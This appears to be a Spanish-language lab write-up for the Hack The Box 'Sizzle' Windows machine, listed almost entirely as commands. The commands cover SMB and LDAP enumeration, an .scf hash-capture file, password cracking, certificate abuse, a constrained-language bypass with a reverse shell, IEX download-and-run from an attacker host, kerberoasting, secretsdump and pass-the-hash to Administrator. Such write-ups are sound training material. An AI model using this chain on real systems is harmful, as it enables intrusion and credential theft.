Sizzle

Sizzle


HTB Windows

nmap -A -p- -oA sizzle 10.129.26.152 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA sizzle 10.129.26.152

nmap -sU -O -p- -oA sizzle-udp 10.129.26.152

nikto -h 10.129.26.152:80

gobuster dir -k -u http://10.129.26.152/ -w /usr/share/wordlists/dirb/big.txt -t 100 -x .txt,.

whichSystem ip

ssh_command.

echo "10.129.26.152 sizzle.htb" | sudo tee -a /etc/hosts

nmap -p- --open -T5 -v -n 10.129.26.152

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.129.26.152 -oG allPorts

ssh_command.

extractPorts allPorts

nmap -sCV -p21,53,80,135,139,389,443,445,464,593,636,3268,3269,5985,5986,9389,47001,49664,49665,49669,49673,49686,49687,49689,49693,49701,49708,49722 10.129.26.152 -oN targeted -oX targetedXML

ssh_command.

xsltproc targetedXML > index.html

python3 -m http.server 80

ssh_command.

nmap --script ftp-anon -p21 10.129.26.152

ssh_command. Nos damos cuenta que si se puede logear como anonymous pero no encontramos nada.

whatweb http://10.129.26.152

ssh_command.

Nos dirigimos a http://10.129.26.152

ssh_command.

openssl s_client -connect 10.129.26.152:443

ssh_command.

Agregamos sizzle.htb.local y htb.local a /etc/hosts

ssh_command.

crackmapexec smb 10.129.26.152

ssh_command.

smbclient -L 10.129.26.152 -N

ssh_command.

smbmap -H 10.129.26.152 -u 'loquesea'

ssh_command.

smbclient "//10.129.26.152/Department Shares" -N

ssh_command.

mount -t cifs "//10.129.26.152/Department Shares" /mnt/montura

“cd /mnt/montura && ls```

ssh_command.

tree -fas

ssh_command.

Creamos un archivo users

batcat users

ssh_command.

python3 /opt/impacket/build/scripts-3.9/GetNPUsers.py htb.local/ -no-pass -usersfile users

ssh_command. No funciona porque el puerto 88 no esta disponible

smbcacls "//10.129.26.152/Department Shares" Users/amanda -N

ssh_command.

for directory in $(ls); do echo "[+] Probando directorio $directory"; done

ssh_command.

for directory in $(ls); do echo -e "\n [+] Probando directorio $directory\n"; echo -e "\t$(smbcacls "/10.129..26.152/Department Shares" Users/$directory -N | grep "Everyone")";done; tput cnorm

ssh_command.

[Shell] Command=2 IconFile=\10.10.xx.xx\share\pentestlab.ico [Taskbar] Command=ToggleDesktop

impacket-smbserver smbFolder $(pwd) -smb2support

ssh_command.

umount /mnt/montura

rm -rf /mnt/montura

ssh_command.

cat hash

ssh_command.

john --wordlist=/usr/share/wordlists/rockyou.txt hash

ssh_command.

Credenciales-> amanda:Ashare1972

crackmapexec smb 10.129.26.152 -u "amanda" -p "Ashare1972"

ssh_command.

crackmapexec winrm 10.129.26.152 -u "amanda" -p "Ashare1972"

ssh_command.

python3 /opt/impacket/build/scripts-3.9/GetUserSPNs.py htb.local/amanda:Ashare1972

ssh_command. rpcclient -U "amanda%Ashare1972" 10.129.26.152

enumdomusers

ssh_command.

querygroupmem

querygroupmem 0x200

queryuser 0x1f4

ssh_command.

queryuser 0x644

ssh_command.

git clone https://github.com/s4vitar/rpcenum

Cambiamos el codigo para que en todo lo que diga rpcclient -U agregamos “amanda%Ashare1972”

ssh_command.

./rpcenum -e DUsers -i 10.129.26.152

./rpcenum -e DGroups -i 10.129.26.152

ssh_command.

./rpcenum -e DUsersInfo -i 10.129.26.152

ssh_command.

ldapdomaindump -u "htb.local\amanda" -p "Ashare1972" 10.129.26.152

ssh_command.

firefox domain_users_by_group.html

ssh_command.

evil-winrm -i 10.129.26.152 -u "amanda" -p "Ashare1972"

ssh_command.

wfuzz -c --hc=404 -t 200 -w /usr/share/SecLists/Discovery/Web-Content/IIS.fuzz.txt http://10.129.26.152/FUZZ

ssh_command.

http://10.129.26.152/certsrv

ssh_command.

Ponemos amanda:Ashare1972

ssh_command.

Le damos click a request a certificate

ssh_command.

Le damos click a advanced certificate request

opensl req -newkey rsa:2048 -nodes -keyout amanda.key -out amanda.csr

ssh_command.

cat amanda.csr | xclip -sel clip

ssh_command.

Le damos click a download certificate

ssh_command.

evil-winrm -S -c certnew.cer -k amanda.key -i 10.129.26.152 -u "amanda" -p "Ashare1972"

ssh_command.

bloodhound-python -c All -u "amanda" -p "Ashare1972" -ns 10.129.26.152 -d htb.local

ssh_command.

neo4j console

bloodhound

ssh_command.

ssh_command.

cd C:\Windows\Temp

mkdir Recon

cd Recon

ssh_command.

$ExecutionContext.SessionState.LanguageMode

ssh_command.

python3 -m http.server 80

ssh_command. git clone https://github.com/padovah4ck/PSByPassCLM

ssh_command.

ssh_command. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.14.99 /rport=443 /U c:\Windows\Temp\Recon\PsBypassCLM.exe

rlwrap nc -lvnp 443

ssh_command. $ExecutionContext.SessionState.LanguageMode

ssh_command.

python3 -m http.server 80

IEX(New-Object Net.WebClient).downloadString('http://10.10.14.99/SharpHound.ps1')

ssh_command.

Invoke-BloodHound -CollectionMethod All

ssh_command.

impacket-smbserver smbFolder $(pwd) -smb2support

copy 2024040391747_BloodHound.zip \\10.10.14.99\smbFolder\2024040391747_BloodHound.zip'

ssh_command. Bajamos Rubeus.exe ssh_command.

cp ~/Downloads/Rubeus.exe .

python3 -m http.server 80

iwr -uri http://10.10.14.99/Rubeus.exe -OutFile Rubeus.exe

ssh_command. ./Rubeus.exe kerberoast /creduser:htb.local\amanda /credpassword:Ashare1972

ssh_command.

ssh_command.

git clone https://github.com/jpilllora/chisel

cd chisel

go build -ldflags "-s -w" .

du -hc chisel

upx chisel

ssh_command. Bajamos el chisel para windows chisel_1.9.1_windows_amd64.gz

ssh_command.

cp ~Downloads/chisel_1.9.1_windows_amd64.gz .

gunzip chisel_1.9.1_windows_amd64.gz

file chisel_1.9.1_windows_amd64

ssh_command.

python3 -m http.server 80

IWR -uri http://10.10.14.99/chisel_1.9.1_windows_amd64 -OutFile chisel.exe

ssh_command.

./chisel server --reverse -p 1234

.\chisel.exe client 10.10.14.99:1234 R:88:127.0.0.1:88 R:389:127.0.0.1:389

ssh_command.

GetUserSPNs.py htb.lcoal/amanda:Ashare1972 -request -dc-ip 127.0.0.1

Copiamos el hash y lo ponemos en un txt

hashcat -a 0 -m 13100 hash /user/share/wordlists/rockyou.txt --force

ssh_command.

secretsdump.py htb.local/mrlky:Football#7@10.129.26.152

ssh_command.

python3 /opt/impacket/build/scripts-3.9/wmiexec.py htb.local/Administrator@sizzle.htb -hashes :f6b7160bfc91823792e0ac3a162c9267

ssh_command.

ssh_command.

© 2024 Cu3rv0x